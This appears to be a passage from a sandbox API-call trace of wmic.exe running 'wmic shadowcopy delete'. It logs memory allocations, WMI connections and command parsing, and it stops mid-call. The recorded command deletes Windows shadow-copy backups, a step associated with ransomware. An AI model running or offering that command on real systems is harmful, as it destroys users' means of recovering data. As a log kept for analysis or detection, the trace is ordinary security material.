[0195.533] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.533] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0195.533] malloc (_Size=0x30) returned 0x2a84c0 [0195.534] malloc (_Size=0x18) returned 0x2ac6b0 [0195.534] free (_Block=0x2ac6b0) [0195.534] malloc (_Size=0x18) returned 0x2ac6b0 [0195.534] malloc (_Size=0x18) returned 0x2ac6d0 [0195.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0195.534] SysStringLen (param_1="TABLE") returned 0x5 [0195.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0195.534] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0195.534] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0195.534] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0195.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0195.534] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0195.534] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0195.534] malloc (_Size=0x30) returned 0x2a8500 [0195.535] malloc (_Size=0x18) returned 0x2ac6f0 [0195.535] free (_Block=0x2ac6f0) [0195.535] malloc (_Size=0x18) returned 0x2ac6f0 [0195.535] malloc (_Size=0x18) returned 0x2ac710 [0195.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0195.535] SysStringLen (param_1="TABLE") returned 0x5 [0195.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0195.535] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0195.535] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0195.535] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.535] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0195.535] malloc (_Size=0x30) returned 0x2a8540 [0195.536] malloc (_Size=0x18) returned 0x2ac730 [0195.536] free (_Block=0x2ac730) [0195.536] malloc (_Size=0x18) returned 0x2ac730 [0195.536] malloc (_Size=0x18) returned 0x2ac750 [0195.536] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0195.536] SysStringLen (param_1="TABLE") returned 0x5 [0195.536] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0195.536] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0195.536] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0195.536] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0195.536] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0195.536] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.536] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0195.536] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0195.536] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0195.536] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0195.536] malloc (_Size=0x30) returned 0x2a8580 [0195.537] FreeThreadedDOMDocument:IUnknown:Release (This=0x23971d0) returned 0x0 [0195.537] free (_Block=0x2a6d80) [0195.537] GetCommandLineW () returned="wmic shadowcopy delete " [0195.679] malloc (_Size=0x40) returned 0x2a6e80 [0195.680] memcpy_s (in: _Destination=0x2a6e80, _DestinationSize=0x3e, _Source=0x3225ec, _SourceSize=0x30 | out: _Destination=0x2a6e80) returned 0x0 [0195.680] malloc (_Size=0x18) returned 0x2ac770 [0195.680] malloc (_Size=0x18) returned 0x2ac790 [0195.680] malloc (_Size=0x18) returned 0x2ac7b0 [0195.680] malloc (_Size=0x18) returned 0x2ac7d0 [0195.680] malloc (_Size=0x80) returned 0x2a6d80 [0195.680] GetLocalTime (in: lpSystemTime=0x1cf6d0 | out: lpSystemTime=0x1cf6d0*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x15, wSecond=0x24, wMilliseconds=0x26)) [0195.680] _vsnwprintf (in: _Buffer=0x2a6d80, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cf628 | out: _Buffer="03-28-2020T08:21:36") returned 19 [0195.680] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.680] malloc (_Size=0x2a) returned 0x2a85c0 [0195.680] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.680] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.680] malloc (_Size=0x2a) returned 0x2a8600 [0195.680] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.680] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.680] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.680] malloc (_Size=0x16) returned 0x2ac7f0 [0195.681] lstrlenW (lpString="shadowcopy") returned 10 [0195.681] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0195.681] malloc (_Size=0x16) returned 0x2ac810 [0195.681] malloc (_Size=0x8) returned 0x2a6e10 [0195.681] free (_Block=0x0) [0195.681] free (_Block=0x2ac7f0) [0195.681] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.681] malloc (_Size=0xe) returned 0x2ac7f0 [0195.681] lstrlenW (lpString="delete") returned 6 [0195.681] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0195.681] malloc (_Size=0xe) returned 0x2ac830 [0195.681] malloc (_Size=0x10) returned 0x2ac850 [0195.681] memmove_s (in: _Destination=0x2ac850, _DestinationSize=0x8, _Source=0x2a6e10, _SourceSize=0x8 | out: _Destination=0x2ac850) returned 0x0 [0195.681] free (_Block=0x2a6e10) [0195.681] free (_Block=0x0) [0195.681] free (_Block=0x2ac7f0) [0195.681] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0195.681] malloc (_Size=0x10) returned 0x2ac7f0 [0195.681] lstrlenW (lpString="QUIT") returned 4 [0195.681] lstrlenW (lpString="shadowcopy") returned 10 [0195.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0195.681] lstrlenW (lpString="EXIT") returned 4 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0195.682] free (_Block=0x2ac7f0) [0195.682] WbemLocator:IUnknown:AddRef (This=0x1e61390) returned 0x2 [0195.682] malloc (_Size=0x10) returned 0x2ac7f0 [0195.682] lstrlenW (lpString="/") returned 1 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0195.682] lstrlenW (lpString="-") returned 1 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0195.682] lstrlenW (lpString="CLASS") returned 5 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0195.682] lstrlenW (lpString="PATH") returned 4 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0195.682] lstrlenW (lpString="CONTEXT") returned 7 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0195.682] lstrlenW (lpString="shadowcopy") returned 10 [0195.682] malloc (_Size=0x16) returned 0x2ac870 [0195.683] lstrlenW (lpString="shadowcopy") returned 10 [0195.832] GetCurrentThreadId () returned 0xa44 [0195.832] ??0CHString@@QEAA@XZ () returned 0x1cf4e0 [0195.832] malloc (_Size=0x18) returned 0x2ac890 [0195.832] malloc (_Size=0x18) returned 0x2ac8b0 [0195.832] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e61390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5f2998 | out: ppNamespace=0xff5f2998*=0x1e73a98) returned 0x0 [0199.335] free (_Block=0x2ac8b0) [0199.335] free (_Block=0x2ac890) [0199.335] CoSetProxyBlanket (pProxy=0x1e73a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0199.335] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.335] GetCurrentThreadId () returned 0xa44 [0199.335] ??0CHString@@QEAA@XZ () returned 0x1cf378 [0199.335] malloc (_Size=0x18) returned 0x2ac890 [0199.335] malloc (_Size=0x18) returned 0x2ac8b0 [0199.335] malloc (_Size=0x18) returned 0x2ac8d0 [0199.335] malloc (_Size=0x18) returned 0x2ac8f0 [0199.336] SysStringLen (param_1="root\\cli") returned 0x8 [0199.336] SysStringLen (param_1="\\") returned 0x1 [0199.336] malloc (_Size=0x18) returned 0x2ac910 [0199.336] SysStringLen (param_1="root\\cli\\") returned 0x9 [0199.336] SysStringLen (param_1="ms_409") returned 0x6 [0199.336] free (_Block=0x2ac8f0) [0199.336] free (_Block=0x2ac8d0) [0199.336] free (_Block=0x2ac8b0) [0199.336] free (_Block=0x2ac890) [0199.336] malloc (_Size=0x18) returned 0x2ac890 [0199.336] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e61390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5f29a0 | out: ppNamespace=0xff5f29a0*=0x1e73b28) returned 0x0 [0199.822] free (_Block=0x2ac890) [0199.822] free (_Block=0x2ac910) [0199.822] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.822] GetCurrentThreadId () returned 0xa44 [0199.822] ??0CHString@@QEAA@XZ () returned 0x1cf4f0 [0199.822] malloc (_Size=0x18) returned 0x2ac910 [0199.822] malloc (_Size=0x18) returned 0x2ac890 [0199.822] malloc (_Size=0x18) returned 0x2ac8b0 [0199.822] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0199.822] malloc (_Size=0x3a) returned 0x2aca40 [0199.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff581980, cbMultiByte=-1, lpWideCharStr=0x2aca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0199.822] free (_Block=0x2aca40) [0199.822] malloc (_Size=0x18) returned 0x2ac8d0 [0199.822] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0199.822] SysStringLen (param_1="shadowcopy") returned 0xa [0199.823] malloc (_Size=0x18) returned 0x2ac8f0 [0199.823] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0199.823] SysStringLen (param_1="'") returned 0x1 [0199.823] free (_Block=0x2ac8d0) [0199.823] free (_Block=0x2ac8b0) [0199.823] free (_Block=0x2ac890) [0199.823] free (_Block=0x2ac910) [0199.823] IWbemServices:GetObject (in: This=0x1e73a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x1cf4f8*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf4f8*=0x1e804e0, ppCallResult=0x0) returned 0x0 [0199.844] malloc (_Size=0x18) returned 0x2ac910 [0199.844] IWbemClassObject:Get (in: This=0x1e804e0, wszName="Target", lFlags=0, pVal=0x1cf420*(varType=0x0, wReserved1=0xff5f, wReserved2=0x0, wReserved3=0x0, varVal1=0xff5f2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf420*(varType=0x8, wReserved1=0xff5f, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0199.844] free (_Block=0x2ac910) [0199.844] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0199.844] malloc (_Size=0x3e) returned 0x2aca40 [0199.844] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0199.844] malloc (_Size=0x18) returned 0x2ac910 [0199.844] IWbemClassObject:Get (in: This=0x1e804e0, wszName="PWhere", lFlags=0, pVal=0x1cf420*(varType=0x0, wReserved1=0xff5f, wReserved2=0x0, wReserved3=0x0, varVal1=0x34e098, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf420*(varType=0x8, wReserved1=0xff5f, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0199.844] free (_Block=0x2ac910) [0199.845] lstrlenW (lpString=" Where ID = '#'") returned 15 [0199.845] malloc (_Size=0x20) returned 0x2aca90 [0199.845] lstrlenW (lpString=" Where ID = '#'") returned 15 [0199.845] malloc (_Size=0x18) returned 0x2ac910 [0199.845] IWbemClassObject:Get (in: This=0x1e804e0, wszName="Connection", lFlags=0, pVal=0x1cf420*(varType=0x0, wReserved1=0xff5f, wReserved2=0x0, wReserved3=0x0, varVal1=0x39d7a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf420*(varType=0xd, wReserved1=0xff5f, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e809c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0199.845] free (_Block=0x2ac910) [0199.845] IUnknown:QueryInterface (in: This=0x1e809c0, riid=0xff587360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cf410 | out: ppvObject=0x1cf410*=0x1e809c0) returned 0x0 [0199.845] GetCurrentThreadId () returned 0xa44 [0199.845] ??0CHString@@QEAA@XZ () returned 0x1cf338 [0199.845] malloc (_Size=0x18) returned 0x2ac910 [0199.845] IWbemClassObject:Get (in: This=0x1e809c0, wszName="Namespace", lFlags=0, pVal=0x1cf360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff59738f, varVal2=0x2ac910), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2ac910), pType=0x0, plFlavor=0x0) returned 0x0 [0199.845] free (_Block=0x2ac910) [0199.846] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0199.846] malloc (_Size=0x16) returned 0x2ac910 [0199.846] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0199.846] malloc (_Size=0x18) returned 0x2ac890 [0199.846] IWbemClassObject:Get (in: This=0x1e809c0, wszName="Locale", lFlags=0, pVal=0x1cf360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2ac910), pType=0x0, plFlavor=0x0) returned 0x0 [0199.846] free (_Block=0x2ac890) [0199.846] lstrlenW (lpString="ms_409") returned 6 [0199.846] malloc (_Size=0xe) returned 0x2ac890 [0199.846] lstrlenW (lpString="ms_409") returned 6 [0199.846] malloc (_Size=0x18) returned 0x2ac8b0 [0199.846] IWbemClassObject:Get (in: This=0x1e809c0, wszName="User", lFlags=0, pVal=0x1cf360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0) returned 0x0 [0199.846] free (_Block=0x2ac8b0) [0199.846] malloc (_Size=0x18) returned 0x2ac8b0 [0199.846] IWbemClassObject:Get (in: This=0x1e809c0, wszName="Password", lFlags=0, pVal=0x1cf360*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0) returned 0x0 [0199.846] free (_Block=0x2ac8b0) [0199.846] malloc (_Size=0x18) returned 0x2ac8b0 [0199.847] IWbemClassObject:Get (in: This=0x1e809c0, wszName="Server", lFlags=0, pVal=0x1cf360*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2ac910), pType=0x0, plFlavor=0x0) returned 0x0 [0199.847] free (_Block=0x2ac8b0) [0199.847] lstrlenW (lpString=".") returned 1 [0199.847] malloc (_Size=0x4) returned 0x2a6e10 [0199.847] lstrlenW (lpString=".") returned 1 [0199.847] malloc (_Size=0x18) returned 0x2ac8b0 [0199.847] IWbemClassObject:Get (in: This=0x1e809c0, wszName="Authority", lFlags=0, pVal=0x1cf360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0x2ac910), pType=0x0, plFlavor=0x0) returned 0x0 [0199.847] free (_Block=0x2ac8b0) [0199.847] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.847] IUnknown:Release (This=0x1e809c0) returned 0x1 [0199.847] GetCurrentThreadId () returned 0xa44 [0199.847] ??0CHString@@QEAA@XZ () returned 0x1cf338 [0199.847] malloc (_Size=0x18) returned 0x2ac8b0 [0199.847] IWbemClassObject:Get (in: This=0x1e804e0, wszName="__RELPATH", lFlags=0, pVal=0x1cf360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cbed8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf360*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0199.848] free (_Block=0x2ac8b0) [0199.848] malloc (_Size=0x18) returned 0x2ac8b0 [0199.848] GetCurrentThreadId () returned 0xa44 [0199.848] ??0CHString@@QEAA@XZ () returned 0x1cf1b8 [0199.848] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf1d0 [0199.848] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1cf160 [0199.848] ?Empty@CHString@@QEAAXXZ () returned 0x7fef931482c [0199.848] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2acac0 [0199.848] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0199.848] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf120 [0199.849] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf168 [0199.849] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf1d0 [0199.849] ??1CHString@@QEAA@XZ () returned 0x7b90ce01 [0199.849] ??1CHString@@QEAA@XZ () returned 0x7b90ce01 [0199.849] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf128 [0199.849] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf160 [0199.849] ??1CHString@@QEAA@XZ () returned 0x1 [0199.849] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2acb30 [0199.850] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0199.850] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf120 [0199.850] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf168 [0199.850] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf1d0 [0199.850] ??1CHString@@QEAA@XZ () returned 0x7b90ce01 [0199.850] ??1CHString@@QEAA@XZ () returned 0x7b90ce01 [0199.850] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf128 [0199.850] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf160 [0199.850] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.850] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef9314820 [0199.850] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.850] malloc (_Size=0x18) returned 0x2ac8d0 [0199.850] malloc (_Size=0x18) returned 0x2ac930 [0199.850] malloc (_Size=0x18) returned 0x2ac950 [0199.850] malloc (_Size=0x18) returned 0x2ac970 [0199.850] malloc (_Size=0x18) returned 0x2ac990 [0199.850] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0199.850] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0199.850] malloc (_Size=0x18) returned 0x2ac9b0 [0199.850] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0199.850] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0199.850] malloc (_Size=0x18) returned 0x2ac9d0 [0199.850] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0199.850] SysStringLen (param_1="\"") returned 0x1 [0199.851] free (_Block=0x2ac9b0) [0199.851] free (_Block=0x2ac990) [0199.851] free (_Block=0x2ac970) [0199.851] free (_Block=0x2ac950) [0199.851] free (_Block=0x2ac930) [0199.851] free (_Block=0x2ac8d0) [0199.851] IWbemServices:GetObject (in: This=0x1e73b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cf1a8*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf1a8*=0x1e80a50, ppCallResult=0x0) returned 0x0 [0199.853] malloc (_Size=0x18) returned 0x2ac8d0 [0199.854] IWbemClassObject:Get (in: This=0x1e80a50, wszName="Text", lFlags=0, pVal=0x1cf1e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff5f2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf1e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3c6310*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x34de30, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0199.854] free (_Block=0x2ac8d0) [0199.854] SafeArrayGetLBound (in: psa=0x3c6310, nDim=0x1, plLbound=0x1cf1c0 | out: plLbound=0x1cf1c0) returned 0x0 [0199.854] SafeArrayGetUBound (in: psa=0x3c6310, nDim=0x1, plUbound=0x1cf1b0 | out: plUbound=0x1cf1b0) returned 0x0 [0199.854] SafeArrayGetElement (in: psa=0x3c6310, rgIndices=0x1cf1a4, pv=0x1cf1f8 | out: pv=0x1cf1f8) returned 0x0 [0199.854] malloc (_Size=0x18) returned 0x2ac8d0 [0199.854] malloc (_Size=0x18) returned 0x2ac930 [0199.854] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0199.854] free (_Block=0x2ac8d0) [0199.854] IUnknown:Release (This=0x1e80a50) returned 0x0 [0199.854] free (_Block=0x2ac9d0) [0199.854] ??1CHString@@QEAA@XZ () returned 0x7b90ce01 [0199.854] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.854] free (_Block=0x2ac8b0) [0199.854] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.855] lstrlenW (lpString="Shadow copy management.") returned 23 [0199.855] malloc (_Size=0x30) returned 0x2a8640 [0199.855] lstrlenW (lpString="Shadow copy management.") returned 23 [0199.855] free (_Block=0x2ac930) [0199.855] IUnknown:Release (This=0x1e804e0) returned 0x0 [0199.855] free (_Block=0x2ac8f0) [0199.855] ??1CHString@@QEAA@XZ () returned 0x7fef931482c [0199.855] lstrlenW (lpString="PATH") returned 4 [0199.855] lstrlenW (lpString="delete") returned 6 [0199.855] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0199.855] lstrlenW (lpString="WHERE") returned 5 [0199.855] lstrlenW (lpString="delete") returned 6 [0199.855] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0199.855] lstrlenW (lpString="(") returned 1 [0199.855] lstrlenW (lpString="delete") returned 6 [0199.855] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0199.855] lstrlenW (lpString="/") returned 1 [0199.855] lstrlenW (lpString="delete") returned 6 [0199.855] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0199.855] lstrlenW (lpString="-") returned 1 [0199.855] lstrlenW (lpString="delete") returned 6 [0199.855] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0199.856] malloc (_Size=0x18) returned 0x2ac8f0 [0199.856] lstrlenW (lpString="GET") returned 3 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.856] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0199.856] lstrlenW (lpString="LIST") returned 4 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.856] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0199.856] lstrlenW (lpString="SET") returned 3 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.856] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0199.856] lstrlenW (lpString="CREATE") returned 6 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.856] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0199.856] lstrlenW (lpString="CALL") returned 4 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.856] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0199.856] lstrlenW (lpString="ASSOC") returned 5 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.856] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0199.856] lstrlenW (lpString="DELETE") returned 6 [0199.856] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0199.857] free (_Block=0x2ac8f0) [0199.857] lstrlenW (lpString="/") returned 1 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0199.857] lstrlenW (lpString="-") returned 1 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] malloc (_Size=0xe) returned 0x2ac8f0 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] lstrlenW (lpString="GET") returned 3 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0199.857] lstrlenW (lpString="LIST") returned 4 [0199.857] lstrlenW (lpString="delete") returned 6 [0199.857] CompareStringW (Locale=0x800, 